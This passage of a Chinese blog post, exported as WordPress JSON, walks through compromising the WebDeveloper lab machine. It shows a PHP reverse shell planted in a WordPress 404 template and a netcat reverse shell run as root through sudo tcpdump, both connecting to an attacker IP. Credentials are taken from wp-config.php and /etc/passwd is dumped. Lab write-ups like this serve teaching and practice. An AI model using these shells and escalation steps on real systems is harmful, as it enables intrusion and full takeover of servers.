\/><\/div><\/p>\n<p>\u770b\u4e00\u4e0b\u5176\u4ed6\u7684\uff0c\u6700\u597d\u53ef\u4ee5\u627e\u51fa\u767b\u5f55\u4fe1\u606f\uff0c\u8fc7\u6ee4\u5b57\u7b26\u4e32\uff0c\u770b\u4e00\u4e0b\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403170103365.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403170103365.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240317001919494\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u53d1\u73b0\u4e86\u7528\u6237\u540d\u548c\u5bc6\u7801\uff0c\u5c1d\u8bd5\u8fdb\u884c\u767b\u5f55\u3002<\/p>\n<pre><code class=\"language-apl\">webdeveloper\nTe5eQg&amp;4sBS!Yr$)wf%(DcAd<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403170103366.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403170103366.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240317002146749\" \/><\/div><\/p>\n<p>\u8fdb\u6765\u4e86\uff01\uff01\uff01\u554a~~<\/p>\n<p>\u6dfb\u52a0\u4e00\u4e2a\u53cd\u5411shell\u5230\u5b83\u7684404\u9875\u9762\u4e0a\uff01<\/p>\n<pre><code class=\"language-php\">&lt;?php exec (&quot;bash -c &#039;exec bash -i &amp;&gt;\/dev\/tcp\/10.161.181.188\/1234 &lt;&amp;1&#039;&quot;);?&gt;<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403170103367.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403170103367.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240317003204745\" \/><\/div><\/p>\n<p>\u8bbf\u95ee\uff1a<\/p>\n<pre><code class=\"language-bash\">wp-content\/plugins\/akismet\/akismet.php<\/code><\/pre>\n<p>\u6267\u884c\u53cd\u5f39shell\uff01<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403170103368.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403170103368.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240317003321280\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u83b7\u53d6\u5230\u4e86shell\uff01\uff01\uff01\uff01<\/p>\n<h2>\u63d0\u6743<\/h2>\n<h3>\u5207\u6362webdeveloper\u7528\u6237<\/h3>\n<p>\u672c\u6765\u60f3\u4f20\u4e00\u4e2a\u516c\u94a5\uff0cssh\u767b\u5f55\u4e00\u4e0b\u7684\uff0c\u521b\u5efa\u4e0d\u4e86<code>.ssh<\/code>\uff0c\u67e5\u770b\u4e00\u4e0b\u76f8\u5173\u4fe1\u606f\uff1a<\/p>\n<pre><code class=\"language-bash\">www-data@webdeveloper:\/home\/webdeveloper$ whoami;id\nwhoami;id\nwww-data\nuid=33(www-data) gid=33(www-data) groups=33(www-data)\nwww-data@webdeveloper:\/home\/webdeveloper$ sudo -l\nsudo -l\nsudo: no tty present and no askpass program specified\nwww-data@webdeveloper:\/home\/webdeveloper$ find \/ -perm -u=s -type f 2&gt;\/dev\/null\n&lt;webdeveloper$ find \/ -perm -u=s -type f 2&gt;\/dev\/null\n\/bin\/su\n\/bin\/mount\n\/bin\/fusermount\n\/bin\/ntfs-3g\n\/bin\/umount\n\/bin\/ping\n\/snap\/core\/16928\/bin\/mount\n\/snap\/core\/16928\/bin\/ping\n\/snap\/core\/16928\/bin\/ping6\n\/snap\/core\/16928\/bin\/su\n\/snap\/core\/16928\/bin\/umount\n\/snap\/core\/16928\/usr\/bin\/chfn\n\/snap\/core\/16928\/usr\/bin\/chsh\n\/snap\/core\/16928\/usr\/bin\/gpasswd\n\/snap\/core\/16928\/usr\/bin\/newgrp\n\/snap\/core\/16928\/usr\/bin\/passwd\n\/snap\/core\/16928\/usr\/bin\/sudo\n\/snap\/core\/16928\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/snap\/core\/16928\/usr\/lib\/openssh\/ssh-keysign\n\/snap\/core\/16928\/usr\/lib\/snapd\/snap-confine\n\/snap\/core\/16928\/usr\/sbin\/pppd\n\/usr\/lib\/snapd\/snap-confine\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/usr\/lib\/eject\/dmcrypt-get-device\n\/usr\/lib\/x86_64-linux-gnu\/lxc\/lxc-user-nic\n\/usr\/lib\/policykit-1\/polkit-agent-helper-1\n\/usr\/bin\/sudo\n\/usr\/bin\/pkexec\n\/usr\/bin\/chfn\n\/usr\/bin\/chsh\n\/usr\/bin\/gpasswd\n\/usr\/bin\/passwd\n\/usr\/bin\/newgidmap\n\/usr\/bin\/newuidmap\n\/usr\/bin\/newgrp\n\/usr\/bin\/at\n\/usr\/bin\/traceroute6.iputils\nwww-data@webdeveloper:\/home\/webdeveloper$ cat \/etc\/cron*\ncat \/etc\/cron*\ncat: \/etc\/cron.d: Is a directory\ncat: \/etc\/cron.daily: Is a directory\ncat: \/etc\/cron.hourly: Is a directory\ncat: \/etc\/cron.monthly: Is a directory\ncat: \/etc\/cron.weekly: Is a directory\n# \/etc\/crontab: system-wide crontab\n# Unlike any other crontab you don&#039;t have to run the `crontab&#039;\n# command to install the new version when you edit this file\n# and files in \/etc\/cron.d. These files also have username fields,\n# that none of the other crontabs do.\n\nSHELL=\/bin\/sh\nPATH=\/usr\/local\/sbin:\/usr\/local\/bin:\/sbin:\/bin:\/usr\/sbin:\/usr\/bin\n\n# m h dom mon dow user  command\n17 *    * * *   root    cd \/ &amp;&amp; run-parts --report \/etc\/cron.hourly\n25 6    * * *   root    test -x \/usr\/sbin\/anacron || ( cd \/ &amp;&amp; run-parts --report \/etc\/cron.daily )\n47 6    * * 7   root    test -x \/usr\/sbin\/anacron || ( cd \/ &amp;&amp; run-parts --report \/etc\/cron.weekly )\n52 6    1 * *   root    test -x \/usr\/sbin\/anacron || ( cd \/ &amp;&amp; run-parts --report \/etc\/cron.monthly )\n#\nwww-data@webdeveloper:\/home\/webdeveloper$ cat \/etc\/passwd\ncat \/etc\/passwd\nroot:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/var\/run\/ircd:\/usr\/sbin\/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):\/var\/lib\/gnats:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\nsystemd-network:x:100:102:systemd Network Management,,,:\/run\/systemd\/netif:\/usr\/sbin\/nologin\nsystemd-resolve:x:101:103:systemd Resolver,,,:\/run\/systemd\/resolve:\/usr\/sbin\/nologin\nsyslog:x:102:106::\/home\/syslog:\/usr\/sbin\/nologin\nmessagebus:x:103:107::\/nonexistent:\/usr\/sbin\/nologin\n_apt:x:104:65534::\/nonexistent:\/usr\/sbin\/nologin\nlxd:x:105:65534::\/var\/lib\/lxd\/:\/bin\/false\nuuidd:x:106:110::\/run\/uuidd:\/usr\/sbin\/nologin\ndnsmasq:x:107:65534:dnsmasq,,,:\/var\/lib\/misc:\/usr\/sbin\/nologin\nlandscape:x:108:112::\/var\/lib\/landscape:\/usr\/sbin\/nologin\npollinate:x:109:1::\/var\/cache\/pollinate:\/bin\/false\nsshd:x:110:65534::\/run\/sshd:\/usr\/sbin\/nologin\nwebdeveloper:x:1000:1000:WebDeveloper:\/home\/webdeveloper:\/bin\/bash\nmysql:x:111:114:MySQL Server,,,:\/nonexistent:\/bin\/false<\/code><\/pre>\n<p>\u518d\u770b\u4e00\u4e0b\u6570\u636e\u5e93\u6587\u4ef6\u5427\uff1a<\/p>\n<pre><code class=\"language-bash\">cd \/var\/www\/html\nls -la\ncat wp-config.php<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403170103369.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403170103369.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240317004031783\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u5c1d\u8bd5\u80fd\u4e0d\u80fdssh\u8fdb\u884c\u767b\u5f55\u3002<\/p>\n<pre><code class=\"language-php\">\/** MySQL database username *\/\ndefine(&#039;DB_USER&#039;, &#039;webdeveloper&#039;);\n\n\/** MySQL database password *\/\ndefine(&#039;DB_PASSWORD&#039;, &#039;MasterOfTheUniverse&#039;);<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403170103370.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403170103370.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240317004301553\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u767b\u5f55\u6210\u529f\u4e86\uff01<\/p>\n<h3>\u63d0\u6743\u81f3root<\/h3>\n<p>\u5c1d\u8bd5\u67e5\u770b\u4e00\u4e0b\u76f8\u5173\u4fe1\u606f\uff0c\u4fe1\u606f\u641c\u96c6\uff01\uff01\uff01<\/p>\n<p>\u521a\u6765\u5c31\u53d1\u73b0\u4e86\u597d\u4e1c\u897f\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403170103371.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403170103371.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240317004500368\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u6211\u4eec\u53ef\u4ee5\u5c1d\u8bd5\u5229\u7528\u8fd9\u4e2a<code>tcpdump<\/code>\uff0c\u53bb\u67e5\u4e00\u4e0b\u6709\u65e0\u5229\u7528\u65b9\u5f0f\uff1a<\/p>\n<pre><code class=\"language-url\">https:\/\/gtfobins.github.io\/gtfobins\/tcpdump\/<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403170103372.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403170103372.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240317004646376\" style=\"zoom: 33%;\" \/><\/div><\/p>\n<p>\u67e5\u770b\u4e00\u4e0b<code>suid<\/code>\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403170103373.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403170103373.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240317004739910\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u5c1d\u8bd5\u63d0\u6743\uff1a<\/p>\n<pre><code class=\"language-bash\">cd \/tmp\necho &quot;rm \/tmp\/f;mkfifo \/tmp\/f;cat \/tmp\/f|\/bin\/sh -i 2&gt;&amp;1|nc 10.161.181.188 1234 &gt;\/tmp\/f&quot; &gt; exp\nchmod +x exp\nsudo tcpdump -ln -i eth0 -w \/dev\/null -W 1 -G 1 -z \/tmp\/exp -Z root<\/code><\/pre>\n<p>\u6307\u4ee4\u8f93\u5165\u5b8c\u4ee5\u540e\u9000\u51fa<code>ssh<\/code>\u767b\u5f55\uff0c\u5c31\u53ef\u4ee5\u5f97\u5230<code>root<\/code>\u4e86<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403170103374.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403170103374.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240317010201589\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403170103375.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403170103375.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240317010236203\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u62ff\u5230\u6211\u4eec\u68a6\u5bd0\u4ee5\u6c42\u7684flag\u4e86\uff01<\/p>\n<pre><code class=\"language-flag\">cba045a5a4f26f1cd8d7be9a5c2b1b34f6c5d290<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>WebDeveloper \u8fd9\u4e2a\u9776\u573a\u4e0d\u77e5\u9053\u4e3a\u5565\uff0c\u4e0b\u8f7d\u5fd2\u6162\u4e86\u3002\u3002\u3002\u3002\u6362\u4e86\u4e00\u4e2a\u8282\u70b9\u4ee5\u540e\u597d\u591a\u4e86\uff01 \u5f00\u59cb\uff01 \u4fe1\u606f\u641c\u96c6 \u7aef [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24],"tags":[],"class_list":["post-405","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/405","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=405"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/405\/revisions"}],"predecessor-version":[{"id":406,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/405\/revisions\/406"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=405"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=405"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=405"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}